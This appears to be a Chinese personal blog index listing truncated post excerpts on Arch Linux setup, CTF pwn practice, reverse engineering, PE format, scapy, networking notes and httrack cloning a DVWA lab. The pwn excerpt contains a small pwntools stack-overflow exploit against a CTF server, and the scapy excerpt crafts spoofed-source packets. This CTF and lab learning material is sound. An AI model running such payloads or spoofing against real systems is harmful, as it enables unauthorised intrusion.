Phantomor

arch linux的搭建分区cgdisk /dev/sda 挂载磁盘分区如下：sda1,2,3,4 sda1 1G boot EFI system sda2 8G swap sda3 40G root / sda4 51G home 以下为格式化 mkfs.fat -F 32 /dev/sda1# 报错了# mkfs.fat: unable to open /dev/sda1# 好像是因为占用了，不会解决重启吧 :Dmkswap /dev/sda2mkfs.ext4 /dev/sda3mkfs.ext4 /dev/sda4 挂载 swapon /dev/sda2mount /dev/sda3 /mntmount /dev/sda1 /mnt/boot # 报错因为没有这个区，输入 mkdir /mnt/boot# 继续类似操作mkdir /mnt/homemount /dev/sda4 /mnt/home#完成挂载操作 lsblk查看挂载 pacman服务器pacman是arch的特色，它结合了简单的二进制包和易于使用的构建系统，pacma ...

pwn做题记录随便做做看看pwn张什么样。随缘更新 解题套路： 检查保护情况 判断漏洞函数，如gets,scanf等 计算目标变量的在堆栈中距离ebp的偏移 分析是否已经载入了可以利用的函数，如system，execve等 分析是否有字符串/bin/sh test_your_nc直接nc连接，没什么好说的 rip知识点 get函数栈溢出 gets函数的缓冲区是由用户本身提供，由于用户无法指定一次最多可读入多少字节，导致此函数存在巨大安全隐患。换句话来说，就是gets若没有遇到 \n 结束，则会无限读取，没有上限。 0x401186是fun函数里有system，s到返回地址有0xF+8=23，但不知道下面的为什么可以 from pwn import *p=remote('node4.buuoj.cn',29226)p1=b'a'*23+p64(0x40118a)p.sendline(p1)p.interactive()payload = b'a' * 23 + p64(0x401186 + 1)payload = b&# ...

逆向

vm逆向与符号执行angr经典无壳，IDAF5直接逆向，改几个名字 int __cdecl vm_operad(int *a1yizhi, int a2){ int result; // eax char inputs[200]; // [esp+13h] [ebp-E5h] BYREF char v4; // [esp+DBh] [ebp-1Dh] int v5; // [esp+DCh] [ebp-1Ch] int z; // [esp+E0h] [ebp-18h] int v7; // [esp+E4h] [ebp-14h] int x; // [esp+E8h] [ebp-10h] int i; // [esp+ECh] [ebp-Ch] i = 0; x = 0; v7 = 0; z = 0; v5 = 0; while ( 1 ) { result = i; if ( i >= a2 ) return result; switch ( a1yizhi[i] ) { ...

什么是PE文件？PE（Portable Execute）文件是Windows下可移植可执行文件的总称，常见的有DLL，EXE，OCX，SYS等，事实上，一个文件是否是PE文件与其扩展名无关。本文要说的PE文件结构，就是指的Window可移植可执行文件结构。 PE文件是使用的是平面地址空间，所有代码和数据都合并在一起，组成了一个很大的结构。 PE文件不是作为单一内存映射文件被载入内存，Windows加载器 (PE装载器) 遍历PE文件并决定哪一部分文件被映射。 PE文件结构PE文件具有较强的移植性；PE结构是一种数据组织方式；PE结构主要应用于windows系统；具有PE结构的文件称为PE文件；EXE、DLL都是PE文件； 一个完整的PE文件主要有4个部分组成：DOS头，PE头，节表以及节数据。1.Dos部分主要用来对非FE格式文件的处理，DOS时代遗留的产物，是PE文件的一个遗传基因;2.PE头部分用于宏观上记录文件的一些信息，，运行平台，大小，创建日期，属性等。3.节表部分用于对各中类型的数据进行定义分段;4.节数据不言而喻就是文件的数据部分，实际上我们编写程序的过程中就是对该部分的 ...

scapy该工具可以改包 使用ARP().display() ###[ ARP ]### hwtype= 0x1 ptype= IPv4 hwlen= None plen= None op= who-has hwsrc= 00:0c:29:b5:d7:1e psrc= 192.168.3.24 hwdst= 00:00:00:00:00:00 pdst= 0.0.0.0 sr1(ARP(pdst="192.168.3.1")) IP()和ICMP()可以生成ping包 sr1(IP(dst="192.168.3.1",src="192.168.3.26")/ICMP(),timeout=1) tcp包 ###[ TCP ]### sport= ftp_data dport= http seq= 0 ack= 0 dataofs= None reserved= 0 flags= S #表示SYN window= 8192 chksum= None urgptr= 0 options= [] ...

网络层遗留的问题 可靠传输(不重复，不丢失，不失序) 不同网络建立连接 可靠传输虚电路 计算机网络应模仿电信网络，使用面向连接的通信方式 虚电路只是逻辑上的连接 网络提供数据报服务 无连接， 网络层不提供服务质量的承诺

在物理层拓展以太网使用光纤扩展主机使用光纤(通常是一对光纤)和一对光纤调制解调器连接到集线器。很容易使主机和几公里以外的集线器相连接。 使用集线器扩展使用多个集线器可连成更大的、多级星形结构的以太网。例如,一个学院的三个系各有一个10 BASE-T以太网,可通过一个主干集线器把各系的以太网连接起来,成为一个更大的以太网。 级联 优点 使原来属于不同碰撞域的以太网上的计算机能够进行跨碰撞域的通信。 扩大了以太网覆盖的地理范围。 缺点 碰撞域增大了,但总的吞吐量并未提高。 如果不同的碰撞域使用不同的数据率,那么就不能用集线器将它们互连起来。 在数据链路层拓展扩展以太网更常用的方法是在数据链路层进行。早期使用网桥,现在使用以太网交换机。 网桥工作在数据链路层。它根据MAc帧的目的地址对收到的帧进行转发和过滤。当网桥收到一个帧时,并不是向所有的接口转发此帧,而是先检查此帧的目的MAC地址,然后再确定将该帧转发到哪个接口,或把它丢弃。 1990年问世的交换式集线器( switching hub)可明显地提高以太网的性能。交换式集线器常称为以太网交换机 (switch)或第二层交换机( ...

数据链路层数据链路层使用的信道主要有两种类型：点对点信道广播信道：一对多链路是一条无缘的点到点的物理线路段，中间没有任何其他的交换结点数据链路(data link)除了物理线路外,还必须有通信协议来控制这些数据的传输。若把实现这些协议件和软件加到链路上，就构成了数据链路。现在最常用的方法是使用适配器（即网卡）来实现这些协议的硬件和软件。一般的适配器都包括了数据链路层和物理层这两层（网络接口层）的功能。链路分为物理链路和逻辑链路物理链路就是链路。逻辑链路就是物理链路加上通信协议 数据链路层传送的是帧 封装成帧 framing首部和尾部就是进行帧定界 透明传输用帧的定界符SOH表示开始，EOT表示结束但在数据内部出现EOT则会把数据出错解决方法：字节填充或字符填充ESC 即转义字符 差错控制在一段时间内，传输错误的比特占所传输比特总数的比率称为误码率BER (Bit Error Rate)。循环冗余检验CRC冗余码计算用二进制的模⒉运算进行2^n^乘M的运算，这相当于在M后面添加n个0。得到的(k+n)位的数除以事先选定好的长度为(n +1)位的除数P得出商是Q而余数是R,余数R比除数Р少 ...

httrack可以克隆网站，将目标网站所有页面复制一份，httrack是专门针对web应用程序服务器进行探测，拷贝目标服务器到本地的主要作用是在探测尽量减少与目标主机产生交互 以下是具体操作 Welcome to HTTrack Website Copier (Offline Browser) 3.49-2+libhtsjava.so.2Copyright (C) 1998-2017 Xavier Roche and other contributorsTo see the option list, enter a blank line or try httrack --helpEnter project name :dvwaBase path (return=/root/websites/) :/root/dvwa Enter URLs (separated by commas or blank spaces) :http://192.168.3.27/dvwaAction:(enter) 1 Mirror Web Site(s) # 镜像网站 2 ...